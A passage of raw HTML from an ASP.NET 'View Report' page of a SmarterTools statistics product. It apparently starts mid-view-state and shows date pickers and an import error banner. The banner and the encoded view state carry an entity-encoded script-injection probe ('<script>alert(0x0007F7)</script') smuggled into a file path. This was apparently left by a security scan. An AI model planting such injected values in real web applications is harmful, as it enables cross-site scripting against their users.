OyYjeDAwNzA7JiN4MDA3NDsmI3gwMDNFOyYjeDAwNjE7JiN4MDA2QzsmI3gwMDY1OyYjeDAwNzI7JiN4MDA3NDsmI3gwMDI4OyYjeDAwMzA7JiN4MDA3ODsmI3gwMDMwOyYjeDAwMzA7JiN4MDAzMDsmI3gwMDM3OyYjeDAwNDY7JiN4MDAzNzsmI3gwMDI5OyYjeDAwM0M7JiN4MDAyRjsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDtcV2ViTG9nc1wxXFNpdGVDb25maWcueG1sLm5ldzMuICBBcyBhIHByZWNhdXRpb24sIHRoaXMgc2VydmVyIGhhcyBiZWVuIHBhdXNlZC4gIEEgcmVib290IG1heSBiZSB0aGUgYmVzdCB3YXkgdG8gc29sdmUgYW55IGZpbGUgbG9ja2luZyBwcm9ibGVtcyB0aGF0IG1heSBiZSBwcmVzZW50Ljxicj48YnI+PGJyPjxicj48L2Rpdj5kAggPFgIfAmhkAgkPZBYCAgEPZBYeAgMPDxYQHgxTZWxlY3RlZERhdGUGAMBRYzcyzQgeB01pbkRhdGUGAEDK+KPo4AceB01heERhdGUGAABowSlcoQkeHEVuYWJsZUVtYmVkZGVkQmFzZVN0eWxlc2hlZXRoHhNFbmFibGVFbWJlZGRlZFNraW5zaB4EU2tpbgUMU21hcnRlclRvb2xzHghDc3NDbGFzcwUSRGF0ZVBpY2tlck92ZXJyaWRlHgRfIVNCAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkeDU9yaWdpbmFsVmFsdWUFFTEwLzUvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTA1LTAwLTAwLTAwHg1MYWJlbENzc0NsYXNzBQdyaUxhYmVsHhdFbmFibGVBamF4U2tpblJlbmRlcmluZ2gfCWgfBwYAQMr4o+jgB2QWBh4FV2lkdGgbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUhvdmVyHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFcnJvch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRm9jdXNlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRW5hYmxlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUUcmlUZXh0Qm94IHJpRGlzYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUVtcHR5Hw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRByaVRleHRCb3ggcmlSZWFkHw0CggJkAgEPDxYEHghJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYeDUhvdmVySW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmFgIeB29uY2xpY2sFPHJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkU3RhcnREYXRlJyksJ2NhbCcpO2QCAg8UKwANDxYaBQ9SZW5kZXJJbnZpc2libGVnBRFFbmFibGVNdWx0aVNlbGVjdGgFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNaW5EBgBAyvij6OAHBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQRNYXhEBgAAaMEpXKEJDxYIHwsFDFNtYXJ0ZXJUb29scx8KaB8JaB8QaGRkFgQfDAULcmNNYWluVGFibGUfDQICFgQfDAUMcmNPdGhlck1vbnRoHw0CAmQWBB8MBQpyY1NlbGVjdGVkHw0CAmQWBB8MBQpyY0Rpc2FibGVkHw0CAhYEHwwFDHJjT3V0T2ZSYW5nZR8NAgIWBB8MBQlyY1dlZWtlbmQfDQICFgQfDAUHcmNIb3Zlch8NAgIWBB8MBTZSYWRDYWxlbmRhck1vbnRoVmlldyBSYWRDYWxlbmRhck1vbnRoVmlld19TbWFydGVyVG9vbHMfDQICFgQfDAUJcmNWaWV3U2VsHw0CAmQCBw8PFhAfBgYAQMxh7jbNCB8HBgBAyvij6OAHHwgGAABowSlcoQkfCWgfCmgfCwUMU21hcnRlclRvb2xzHwwFEkRhdGVQaWNrZXJPdmVycmlkZR8NAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkfDgUWMTAvMTEvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTExLTAwLTAwLTAwHw8FB3JpTGFiZWwfEGgfCWgfBwYAQMr4o+jgB2QWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlIb3Zlch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAURcmlUZXh0Qm94IHJpRXJyb3IfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUZvY3VzZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUVuYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFFHJpVGV4dEJveCByaURpc2FibGVkHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFbXB0eR8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUQcmlUZXh0Qm94IHJpUmVhZB8NAoICZAIBDw8WBB8SBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8TBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxQFOnJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkRW5kRGF0ZScpLCdjYWwnKTtkAgIPFCsADQ8WGgUPUmVuZGVySW52aXNpYmxlZwURRW5hYmxlTXVsdGlTZWxlY3RoBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWluRAYAQMr4o+jgBwUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUDRVJTaAUSTmF2aWdhdGlvblByZXZUZXh0ZQULU3BlY2lhbERheXMPBZIBVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuQ2FsZW5kYXJEYXlDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQUETWF4RAYAAGjBKVyhCQ8WCB8LBQxTbWFydGVyVG9vbHMfCmgfCWgfEGhkZBYEHwwFC3JjTWFpblRhYmxlHw0CAhYEHwwFDHJjT3RoZXJNb250aB8NAgJkFgQfDAUKcmNTZWxlY3RlZB8NAgJkFgQfDAUKcmNEaXNhYmxlZB8NAgIWBB8MBQxyY091dE9mUmFuZ2UfDQICFgQfDAUJcmNXZWVrZW5kHw0CAhYEHwwFB3JjSG92ZXIfDQICFgQfDAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHw0CAhYEHwwFCXJjVmlld1NlbB8NAgJkAgkPFgIfAmhkAgsPFgIfAmhkAg0PFgIfAmhkAg8PFgIfAmhkAhEPFgIfAmhkAhMPFgIfAmhkAhUPFgIfAmhkAhcPFgIfAmhkAhkPFgIfAmgWAgIBDxBkZBYAZAIbDxYCHwJoZAIdDxYCHwJoZAIfDxYCHwJoZAIhDw8WAh8FBQpHZXQgUmVwb3J0ZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgYFFmN0bDAwJE1QSCRSYWRTdGFydERhdGUFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFFGN0bDAwJE1QSCRSYWRFbmREYXRlBR1jdGwwMCRNUEgkUmFkRW5kRGF0ZSRjYWxlbmRhcgUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXKTgIeSE/kwhinT4a3Qhsjk7T/NRv2iB6x/fy0Bw6CLSQ==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
